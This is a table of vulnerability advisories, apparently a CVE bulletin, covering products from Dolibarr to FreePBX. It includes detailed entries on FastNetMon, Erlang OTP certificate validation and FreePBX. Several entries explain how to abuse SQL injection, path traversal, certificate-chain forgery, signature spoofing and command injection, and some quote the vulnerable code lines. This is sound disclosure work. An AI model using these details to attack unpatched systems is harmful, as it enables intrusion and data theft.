| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via the htdocs/core/class/commonobject.class.php. | 2026-05-27 | not yet calculated | CVE-2026-37713 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-cq92-jp5j-rwvj https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
| dotCMS--dotCMS Core | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in the Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll) in dotCMS Core 25.11.04-1 through 26.04.28-02 allows remote unauthenticated attackers to read, modify, or destroy arbitrary database content. The endpoints did not enforce authentication and accepted unsanitized input used in dynamically constructed SQL. The fix in dotCMS Core 26.04.28-03 requires an authenticated backend user with the publishing-queue portlet permission. LTS releases are not affected as the vulnerable code path was never backported. | 2026-05-27 | not yet calculated | CVE-2026-8054 | dotCMS Known Security Issues — SI-75 dotCMS/core#35553 — Fix SQL injection in Publish Audit API |
| Drupal--SAML SSO - Service Provider | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal SAML SSO - Service Provider allows Privilege Escalation. This issue affects SAML SSO - Service Provider: from 0.0.0 before 3.1.4. | 2026-05-28 | not yet calculated | CVE-2026-5343 | https://www.drupal.org/sa-contrib-2026-031 |
| Drupal--TFA Basic Plugins | An access bypass vulnerability in Drupal TFA Basic Plugins allows users with the administer users permission to view or generate recovery codes for other users. This issue affects TFA Basic Plugins: from 7.x-1.0 through 7.x-1.2. | 2026-05-28 | not yet calculated | CVE-2026-6816 | Drupal security advisory SA-CONTRIB-2025-085 https://d7es.tag1.com/security-advisories/tfa-basic-plugins-less-critical-access-bypass-sa-contrib-2025-085 |
| Easyelife--App Lock | Easyelife App Lock (aka Fingerprint, Applock or locker.app.safe.applocker) 1.9.2 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows (insecure navigation through exposed routes facilitates app control evasion [I.N.T.E.R.F.A.C.E] via advertisement or browser intents), an attacker can evade lockscreen verification and access protected apps (e.g., Chrome), resulting in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68710 | https://play.google.com/store/apps/details?id=locker.app.safe.applocker https://github.com/actuator/locker.app.safe.applocker https://github.com/actuator/locker.app.safe.applocker/blob/main/CVE-2025-68710 |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In 3.8.8 and earlier, there is persistent local-pty code execution via imported bookmarks or compromised sync targets. Affects users who import bookmark JSON files or who have electerm sync configured (gist/WebDAV). The attacker can inject exec* fields or global config to cause remote code to run when a bookmark is opened or when sync is applied. | 2026-05-28 | not yet calculated | CVE-2026-45058 | https://github.com/electerm/electerm/security/advisories/GHSA-jgg9-rw32-44pj |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. From 3.0.6 to 3.8.8, This vulnerability is fixed in 3.9.0. | 2026-05-28 | not yet calculated | CVE-2026-45353 | https://github.com/electerm/electerm/security/advisories/GHSA-7p5m-v798-f8vv https://github.com/electerm/electerm/commit/0599e67069b00e376a2e962649aaad6096e63507 |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.9.5, deterministic AES-192-CBC with a fixed zero IV, constant KDF salt, and no MAC leads to confidentiality and integrity failures for synced bookmark/profile data. Attackers can crack common passwords across installs and perform undetected ciphertext bit-flips to alter config/bookmarks. This vulnerability is fixed in 3.9.5. | 2026-05-28 | not yet calculated | CVE-2026-45787 | https://github.com/electerm/electerm/security/advisories/GHSA-g29v-q6h7-76wh https://github.com/electerm/electerm/commit/9dd8295e37d53396b980cd45dfc5ed11ad79b937 |
| element-hq--synapse | Synapse is an open source Matrix homeserver implementation. Prior to 1.152.1, in federated rooms, malicious homeservers can craft room events in such a way that prevents Synapse from providing full history to paginating clients. Clients could therefore fail to display room history. This vulnerability is fixed in 1.152.1. | 2026-05-28 | not yet calculated | CVE-2026-45076 | https://github.com/element-hq/synapse/security/advisories/GHSA-6qf2-7x63-mm6v |
| element-hq--synapse | Synapse is an open source Matrix homeserver implementation. Prior to 1.152.1, local authenticated users can cause Synapse to starve other requests of CPU and lead to other requests failing, causing other users to be denied service. This vulnerability is fixed in 1.152.1. | 2026-05-28 | not yet calculated | CVE-2026-45078 | https://github.com/element-hq/synapse/security/advisories/GHSA-8q93-326v-3m7g |
| Emlog--Emlog Pro v2.6.9 | The template upload feature in Emlog Pro v2.6.9 has a path traversal vulnerability, allowing authenticated administrators to execute arbitrary PHP code. By uploading a malicious ZIP archive containing directory traversal sequences in filenames, an attacker can overwrite default template files or directly include malicious code files in the current template. | 2026-05-29 | not yet calculated | CVE-2026-39276 | https://www.emlog.net/ https://github.com/LING12138-sg/Emlog-v2.6.9-Vulnerability-Report |
| Erlang--OTP | Improper Following of a Certificate's Chain of Trust vulnerability in Erlang OTP public_key (pubkey_cert module) allows a non-CA certificate to be accepted as an intermediate issuer, enabling certificate chain forgery. In lib/public_key/src/pubkey_cert.erl, pubkey_cert:validate_extensions/7 contains two flaws that together allow a certificate with basicConstraints cA:false and no keyUsage extension to be used as an intermediate issuer in a chain passed to public_key:pkix_path_validation/3: the cA:false clause recurses into the remaining extensions without rejecting the certificate when it is in issuer position, and the keyUsage check only fires when the extension is present, so a certificate lacking keyUsage entirely bypasses the keyCertSign enforcement. Any party holding an end-entity certificate with basicConstraints cA:false and no keyUsage extension, issued by any CA in the victim's trust store, can use that certificate's private key to sign forged leaf certificates for arbitrary identities. public_key:pkix_path_validation/3 accepts the resulting chain, and by extension every TLS or mTLS endpoint built on the OTP ssl application that relies on the default verifier is affected, including server identity verification on the client side and client certificate verification on mTLS servers. This issue affects OTP from OTP 17.0 before OTP 26.2.5.21, 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 0.22 before 1.15.1.7, 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42789 | https://github.com/erlang/otp/security/advisories/GHSA-c99q-jmpx-v8qq https://cna.erlef.org/cves/CVE-2026-42789.html https://osv.dev/vulnerability/EEF-CVE-2026-42789 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/471cd2f664300a95353c467873800bbe706005db https://github.com/erlang/otp/commit/59c8d824386b2eb1614ff9340624843ef6aca0fd |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_cert and public_key modules) allows a DNS nameConstraints bypass via subject CommonName fallback in TLS hostname verification. Two flaws combine to allow a subordinate CA whose DNS nameConstraints are restricted (e.g. permitted;DNS:allowed.example.com) to issue a leaf certificate that an OTP TLS client accepts as a valid identity for an out-of-scope hostname (e.g. victim.example.com): First, pubkey_cert:validate_names/6 in lib/public_key/src/pubkey_cert.erl only checks SAN DNS entries against nameConstraints. Per RFC 5280, a permitted DNS subtree only restricts certificates that contain a DNS-typed name. A leaf with no subjectAltName therefore trivially satisfies any permitted;DNS:... constraint regardless of its subject commonName. Second, public_key:pkix_verify_hostname/3 in lib/public_key/src/public_key.erl falls back to the subject commonName when no subjectAltName is present, extracting id-at-commonName attributes as presented IDs and matching them against the reference hostname. The strict pkix_verify_hostname_match_fun(https) matcher does not suppress this fallback. The result is that path validation accepts a CN-only leaf under a DNS-constrained intermediate (no SAN means the nameConstraints are not triggered), and hostname verification then accepts it via the CN fallback. The bypass is reachable from stock ssl:connect with verify_peer, a trusted CA, SNI, and the canonical strict https hostname matcher. This issue affects OTP from OTP 19.3 before OTP 26.2.5.21, 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 1.4 before 1.15.1.7, 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42790 | https://github.com/erlang/otp/security/advisories/GHSA-22cw-4ph4-6447 https://cna.erlef.org/cves/CVE-2026-42790.html https://osv.dev/vulnerability/EEF-CVE-2026-42790 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/0769050c69d73762672b0db1347b6993a5b31759 https://github.com/erlang/otp/commit/fb67c6d1836f51105a96d8b769e71e4215a79457 https://github.com/erlang/otp/commit/21abed64eb2026b5f82f432709e4e932f9be389a |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows forged OCSP responses signed with an expired responder certificate to be accepted as valid. OCSP response verification in pubkey_ocsp:verify_response/5 and pubkey_ocsp:is_authorized_responder/3 in lib/public_key/src/pubkey_ocsp.erl does not check the validity period (notBefore/notAfter) of the OCSP responder certificate. An attacker who has obtained the private key of an expired CA-designated OCSP responder certificate can forge OCSP responses that Erlang/OTP accepts as valid. This affects TLS clients using OCSP stapling via the ssl application: a malicious or compromised server can present a revoked TLS certificate together with a forged OCSP response signed by an expired responder key, and the client will accept the revoked certificate as valid. It also affects applications calling public_key:pkix_ocsp_validate/5 directly, where the impact depends on the use case - server-side client certificate validation using this API may allow authentication bypass with a revoked client certificate. This issue affects OTP from OTP 27.0 before OTP 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 1.16 before 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42791 | https://github.com/erlang/otp/security/advisories/GHSA-cjxj-wj6x-3fff https://cna.erlef.org/cves/CVE-2026-42791.html https://osv.dev/vulnerability/EEF-CVE-2026-42791 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/7995f1fdaee3da569bb810358ce0f546471d169b https://github.com/erlang/otp/commit/b3870e02405c709a872b01ba6086065620cdfe76 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, the legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put. The router concatenates the path components without sanitizing them, producing a storage key. When this key is used, the underlying file system resolves the relative segments and writes the file to the specified path. Thus an attacker can craft a request that writes data to arbitrary locations on the server. | 2026-05-28 | not yet calculated | CVE-2026-44593 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3636-h3vx-6465 |
| ex-aws--ex_aws_sns | Improper Certificate Validation vulnerability in ex-aws ex_aws_sns (ExAws.SNS, ExAws.SNS.PublicKeyCache modules) allows Signature Spoofing by Improper Validation. This vulnerability is associated with program files lib/ex_aws/sns.ex, lib/ex_aws/sns/public_key_cache.ex and program routines 'Elixir.ExAws.SNS':verify_message/1, 'Elixir.ExAws.SNS.PublicKeyCache':get/1. 'Elixir.ExAws.SNS':verify_message/1 fetches the signing certificate from the SigningCertURL field of the incoming SNS message without validating that the URL uses HTTPS or that the host matches an AWS-owned SNS certificate domain. An unauthenticated attacker who can POST to an endpoint that calls verify_message/1 can supply an attacker-controlled SigningCertURL, sign a forged SNS message with their own key, and cause the function to return :ok, completely bypassing SNS signature verification. This issue affects ex_aws_sns: from 2.0.1 before 2.3.5. | 2026-05-28 | not yet calculated | CVE-2026-47074 | https://github.com/ex-aws/ex_aws_sns/security/advisories/GHSA-8jgf-23q5-x7xx https://cna.erlef.org/cves/CVE-2026-47074.html https://osv.dev/vulnerability/EEF-CVE-2026-47074 https://github.com/ex-aws/ex_aws_sns/commit/1853d280b152d10384a1e21a22cf22152a60be48 |
| Falco Solutions--PHPPageBuilder v0.31.0 | Falco Solutions PHPPageBuilder v0.31.0 contains an unrestricted file upload vulnerability in the pagemanager/pagebuilder module that allows remote attackers to upload arbitrary files and achieve remote code execution. The vulnerability exists due to insufficient validation of uploaded file types and executable content. | 2026-05-29 | not yet calculated | CVE-2026-39292 | https://github.com/HansSchouten/PHPageBuilder https://github.com/krishnadevpmelevila/CVE-2026-39292/tree/main |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 has out-of-bounds memory access because it incorrectly parses BGP path attributes with the extended length flag set. In src/bgp_protocol.hpp, the parse_raw_bgp_attribute() function correctly identifies when extended_length_bit is set and sets length_of_length_field to 2, but then reads only a single byte for the attribute value length (attribute_value_length = value[2] at line 173). Per RFC 4271 Section 4.3, when the Extended Length bit is set, the Attribute Length field is two octets and the value should be read as a 16-bit big-endian integer from value[2] and value[3]. As a result, any attribute longer than 255 bytes has its length silently truncated to the low byte (e.g., 300 bytes = 0x012C is read as 0x2C = 44 bytes). The remaining 256 bytes are then misinterpreted as subsequent attributes, causing cascading parse failures and potential out-of-bounds memory access. | 2026-05-26 | not yet calculated | CVE-2026-48685 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48685-bgp-extended-length |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read vulnerability in the NetFlow v9 data flowset processor. In src/netflow_plugin/netflow_v9_collector.cpp, the Data template branch (lines 1695-1702) iterates over flow records without performing a per-iteration bounds check against the packet end pointer. In contrast, the Options template branch (lines 1709-1719) correctly checks 'if (pkt + offset + field_template->total_length > packet_end)' before each iteration. The Data branch omits this check entirely. Since template definitions are sent by the network peer (and are unauthenticated UDP), an attacker can craft templates that cause the parser to read arbitrary memory past the packet buffer. This can leak sensitive memory contents or cause a crash. | 2026-05-26 | not yet calculated | CVE-2026-48683 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/netflow_plugin/netflow_v9_collector.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48683-netflow-v9-data-oob |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read in the NetFlow v9 options template parser. In process_netflow_v9_options_template() (src/netflow_plugin/netflow_v9_collector.cpp), the scope parsing loop (lines 224-229) iterates until scopes_offset reaches the attacker-controlled option_scope_length value, reading netflow9_template_flowset_record_t structures at each step. No bounds check validates that (zone_address + scopes_offset + sizeof(record)) stays within the flowset. The same issue affects the options field loop (lines 241-257) with option_length. Furthermore, option_scope_length is not validated to be a multiple of sizeof(netflow9_template_flowset_record_t), potentially causing misaligned reads. An attacker can trigger reads past the end of the UDP packet buffer. | 2026-05-26 | not yet calculated | CVE-2026-48684 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/netflow_plugin/netflow_v9_collector.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48684-netflow-v9-options-oob |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains a stack-based buffer overflow in the BGP NLRI (Network Layer Reachability Information) decoder. The function decode_bgp_subnet_encoding_ipv4_raw() in src/bgp_protocol.cpp reads prefix_bit_length directly from the BGP packet (line 99) without validating it is <= 32 for IPv4 prefixes. This value is passed to how_much_bytes_we_need_for_storing_certain_subnet_mask() which computes ceil(prefix_bit_length / 8), returning up to 32 bytes for a prefix_bit_length of 255. The result is used as the length argument to memcpy() (line 106), which copies into a 4-byte uint32_t stack variable (prefix_ipv4). This causes a stack buffer overflow of up to 28 bytes, which can be exploited for arbitrary code execution. Additionally, the unvalidated prefix_bit_length is passed to convert_cidr_to_binary_netmask_local_function_copy() (line 111), where a shift of (32 - cidr) with cidr > 32 causes undefined behavior. | 2026-05-26 | not yet calculated | CVE-2026-48686 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48686-bgp-nlri-stack-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an OS command injection vulnerability in the Juniper router integration plugin. The _log() function in src/juniper_plugin/fastnetmon_juniper.php (lines 117-118) constructs shell commands by concatenating the $msg parameter directly into exec() calls: exec("echo `date` \"- {FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP). The $msg variable contains unsanitized data derived from command-line arguments argv[1] through argv[3], which represent the attack IP address, direction, and power. While FastNetMon's C++ core currently passes IP addresses via inet_ntoa() (which only produces safe dotted-decimal notation), the PHP script performs no input validation or shell escaping. If the script is invoked directly, by another orchestration system, or if future code changes pass string-sourced IPs, arbitrary commands can be injected. The correct fix is to replace exec() with file_put_contents() or use escapeshellarg() on all parameters. | 2026-05-26 | not yet calculated | CVE-2026-48687 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/juniper_plugin/fastnetmon_juniper.php https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48687-juniper-cmd-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains multiple out-of-bounds reads in the BGP MP_REACH_NLRI IPv6 attribute decoder. The function decode_mp_reach_ipv6() in src/bgp_protocol.cpp contains a TODO comment at line 156 explicitly acknowledging 'we should add sanity checks to avoid reads after attribute memory block.' The function casts raw pointers to structure types without verifying sufficient data exists (line 158), uses the attacker-controlled length_of_next_hop field to determine memcpy size (line 181), and computes prefix_length by dereferencing a pointer calculated from multiple attacker-controlled offsets without bounds validation (line 189). The prefix_length is then used to calculate number_of_bytes_required_for_prefix which becomes a memcpy length (line 202) with no check against remaining buffer size. | 2026-05-26 | not yet calculated | CVE-2026-48688 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48688-bgp-mp-reach-nlri-ipv6 |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an off-by-one heap-based buffer overflow in the dynamic_binary_buffer_t class (src/dynamic_binary_buffer.hpp). Five methods (append_dynamic_buffer, append_data_as_pointer, append_data_as_object_ptr, memcpy_from_ptr, memcpy_from_object_ptr) use an incorrect bounds check of the form 'if (offset + length > maximum_internal_storage_size + 1)' instead of the correct 'if (offset + length > maximum_internal_storage_size)'. This allows writing exactly one byte past the end of the heap-allocated buffer. The class is used pervasively in BGP message encoding/decoding, NetFlow template processing, and Flow Spec NLRI construction. An attacker who can send network traffic (NetFlow, sFlow, IPFIX, or BGP) to a FastNetMon instance can trigger this overflow, potentially achieving arbitrary code execution by corrupting heap metadata. Notably, the append_byte() method uses the correct bounds check, confirming the inconsistency. | 2026-05-26 | not yet calculated | CVE-2026-48689 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/dynamic_binary_buffer.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48689-dynamic-buffer-off-by-one |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an integer overflow vulnerability in the packet capture buffer allocation. In src/packet_storage.hpp, the allocate_buffer() function computes memory_size_in_bytes as 'buffer_size_in_packets * (max_captured_packet_size + sizeof(fastnetmon_pcap_pkthdr_t)) + sizeof(fastnetmon_pcap_file_header_t)' using unsigned int (32-bit) arithmetic. With max_captured_packet_size=1500 and sizeof(fastnetmon_pcap_pkthdr_t)=16, each packet requires approximately 1516 bytes. If buffer_size_in_packets exceeds approximately 2,832,542, the multiplication overflows, resulting in a much smaller allocation than expected. Subsequent write_packet() calls then write past the allocated buffer, causing heap corruption. The buffer_size_in_packets value is derived from the ban_details_records_count configuration parameter, which is parsed using atoi() with no overflow checking. | 2026-05-26 | not yet calculated | CVE-2026-48690 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/packet_storage.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48690-packet-storage-integer-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an integer overflow in the BGP AS_PATH attribute encoder. In src/bgp_protocol.hpp, the IPv4UnicastAnnounce::get_attributes() function computes attribute_length as 'sizeof(bgp_as_path_segment_element_t) + this->as_path_asns.size() * sizeof(uint32_t)' and stores it in a uint8_t field (line 600-605). Since uint8_t can only hold values 0-255, an AS_PATH containing more than 63 ASNs (2 + 64*4 = 258 > 255) causes silent truncation. The truncated length is used for buffer sizing, while the actual data written is the full untruncated amount, resulting in a heap buffer overflow. Similarly, the path_segment_length field at line 621 is also uint8_t, truncating with more than 255 ASNs. | 2026-05-26 | not yet calculated | CVE-2026-48691 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48691-bgp-as-path-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 exposes a gRPC API server on port 50052 with no authentication mechanism. The server is initialized with grpc::InsecureServerCredentials() (src/fastnetmon.cpp line 477) and a source code comment explicitly acknowledges 'Listen on the given address without any authentication mechanism.' None of the RPC methods in src/api.cpp (ExecuteBan, ExecuteUnBan, GetBanlist, GetTotalTrafficCounters, etc.) perform any credential verification. The ExecuteBan and ExecuteUnBan methods trigger security-critical actions: BGP route announcements that can blackhole network traffic, and execution of external notification scripts via popen(). An attacker with local network access can ban arbitrary IP addresses (causing denial of service to legitimate traffic), unban active attacks (disabling DDoS mitigation), and trigger script execution. There is also no role-based access control separating read-only monitoring from destructive administrative operations. | 2026-05-26 | not yet calculated | CVE-2026-48692 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/api.cpp https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48692-grpc-no-auth |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 is vulnerable to a local symlink attack via predictable file paths in /tmp. The statistics file path defaults to '/tmp/fastnetmon.dat' (src/fastnetmon.cpp line 159). The print_screen_contents_into_file() function (src/fastnetmon_logic.cpp line 2186) opens this path with std::ios::trunc without checking for symlinks or using O_NOFOLLOW. Additionally, the chmod() call on line 2190 always operates on cli_stats_file_path regardless of which file_path parameter was passed (a bug that applies wrong permissions), and the umask is set to 0 during daemonization (src/fastnetmon.cpp line 1821), making all created files world-writable. A local attacker can exploit this to overwrite arbitrary files as the FastNetMon process user (typically root). | 2026-05-26 | not yet calculated | CVE-2026-48693 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon.cpp https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon_logic.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48693-symlink-tmp |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains a configuration injection vulnerability in the Juniper router integration plugin. In src/juniper_plugin/fastnetmon_juniper.php, the $IP_ATTACK variable (received from argv[1]) is directly interpolated into Juniper NETCONF set-configuration commands at lines 69 and 90 without any validation or sanitization. Line 69: $conn->load_set_configuration("set routing-options static route {$IP_ATTACK} community 65535:666 discard"). Line 90: $conn->load_set_configuration("delete routing-options static route {$IP_ATTACK}/32"). An attacker who can control the IP address string can inject additional Juniper CLI configuration commands by embedding newline characters followed by arbitrary set/delete commands. This could modify the router's routing table, firewall filters, user accounts, or any other configuration element accessible via NETCONF. The impact is full router compromise. | 2026-05-26 | not yet calculated | CVE-2026-48694 | https://github.com/pavel-odintsov/fastnetmon https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48694-juniper-netconf-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an OS command injection vulnerability in the MikroTik router integration plugin. The _log() function in src/mikrotik_plugin/fastnetmon_mikrotik.php (lines 107-108) constructs shell commands by concatenating the $msg parameter directly into exec() calls: exec("echo `date` \"- {FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP). This is identical in pattern to the Juniper plugin vulnerability. The $msg variable contains unsanitized attack data from command-line arguments. An attacker who can influence argv[] values can inject arbitrary shell commands. The fix is to replace exec() with file_put_contents() or use escapeshellarg(). | 2026-05-26 | not yet calculated | CVE-2026-48695 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/mikrotik_plugin/fastnetmon_mikrotik.php https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48695-mikrotik-cmd-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 has a buffer overflow, a different vulnerability than CVE-2026-48686 and CVE-2026-48689. | 2026-05-26 | not yet calculated | CVE-2026-48696 | https://github.com/pavel-odintsov/fastnetmon https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48696-exabgp-sprintf-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 does not verify TLS certificates on outbound HTTPS connections. The execute_web_request_secure() function in src/fast_library.cpp creates a boost::asio::ssl::context with tls_client mode and calls set_default_verify_paths() to load CA certificates, but never calls set_verify_mode(boost::asio::ssl::verify_peer). Without this call, OpenSSL performs the TLS handshake without validating the server's certificate chain, making all HTTPS connections vulnerable to man-in-the-middle attacks. This function is used for telemetry reporting to community-stats.fastnetmon.com, which sends system information including CPU model, kernel version, traffic statistics, and software configuration. An attacker can intercept and modify this data or redirect it to a malicious server. | 2026-05-26 | not yet calculated | CVE-2026-48697 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fast_library.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48697-missing-tls-validation |
| flowintel--flowintel | FlowIntel up to version 3.3.0 contains a server-side request forgery (SSRF) vulnerability in the external reference URL probe functionality in app/case/task.py. An attacker who can submit an external reference URL can cause the application server to issue an HTTP HEAD request to an attacker-specified destination. Due to insufficient validation of the URL scheme and resolved destination address, affected versions may allow requests to loopback, link-local, private, reserved, or other restricted network resources, potentially enabling interaction with internal services or cloud metadata endpoints from the server's network context. | 2026-05-28 | not yet calculated | CVE-2026-9813 | https://github.com/flowintel/flowintel/commit/68b523b47854c54bf36fd706c0fd5353063b5409 |
| Follet School Solutions--Destiny | Cross Site Scripting vulnerability in Follet School Solutions Destiny before v22.0.1 AU1 allows a remote attacker to run arbitrary client-side code via the showSupportExpiredMessage parameter of handleloginform.do. | 2026-05-28 | not yet calculated | CVE-2024-47096 | https://www.securin.io/zero-day/cve-2024-47096-reflected-cross-site-scripting-in-follett-school-solutions-destiny-library-manager/ |
| Follet School Solutions--Destiny | Cross Site Scripting vulnerability in Follet School Solutions Destiny before v22.0.1 AU1 allows a remote attacker to run arbitrary client-side code via the site parameter of handleloginform.do. | 2026-05-28 | not yet calculated | CVE-2024-47097 | https://www.securin.io/zero-day/cve-2024-47097-reflected-cross-site-scripting-in-follett-school-solutions-destiny-library-manager/ |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the free5GC UDM component fails to validate the supi path parameter in six GET handlers of the nudm-sdm (Subscriber Data Management) service. An unauthenticated attacker can inject control characters into the SUPI parameter, causing UDM to forward a malformed request to UDR and return a 500 Internal Server Error response that exposes internal infrastructure details. This vulnerability is fixed in 4.2.2. | 2026-05-27 | not yet calculated | CVE-2026-42459 | https://github.com/free5gc/free5gc/security/advisories/GHSA-585v-hcgf-jhfr |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 17.0.8, the FreePBX api module's OAuth2 implementation does not sufficiently validate client credentials during token issuance. Knowledge of a valid client_id is required. The validateClient() method in ClientRepository.php unconditionally returns true, allowing any party with knowledge of a valid client_id to obtain OAuth2 access tokens without providing the correct client_secret. This vulnerability is fixed in 17.0.8. | 2026-05-29 | not yet calculated | CVE-2026-44237 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vgjf-4h63-8vcc |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 16.0.50 and 17.0.11, the CDR Reports module page allows SQL injection through the order and sort POST parameters. Authentication with a FreePBX Administration Control Panel account that has CDR section access is required. Full administrator privileges are not needed. This vulnerability is fixed in 16.0.50 and 17.0.11. | 2026-05-29 | not yet calculated | CVE-2026-44238 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-p9fq-fmpw-2h9x |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 16.0.22 and 17.0.5, the Dashboard module's getcontent AJAX handler includes PHP files based on user-supplied input without path sanitization. The $_REQUEST['rawname'] parameter is concatenated into an include() call with a .class.php suffix, allowing path traversal via ../ sequences to include arbitrary .class.php files from the filesystem. The included file's PHP code executes before the subsequent class instantiation error occurs. This vulnerability is fixed in 16.0.22 and 17.0.5. | 2026-05-29 | not yet calculated | CVE-2026-44239 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-hw7v-v2jp-wc4v |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. From 15.0.42 to before 16.0.45 and 17.0.7, unauthenticated users may be able to access the User Control Panel (UCP) using hard-coded initial template credentials if these were not immediately changed by the Administrator who enabled UCP. Authenticated access to ACP is required for the initial setup of UCP generic templates, but after that, without further steps by the admin, unauthenticated users may be able to gain access. This vulnerability is fixed in 16.0.45 and 17.0.7. | 2026-05-29 | not yet calculated | CVE-2026-46376 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m55x-h47x-v3gx |
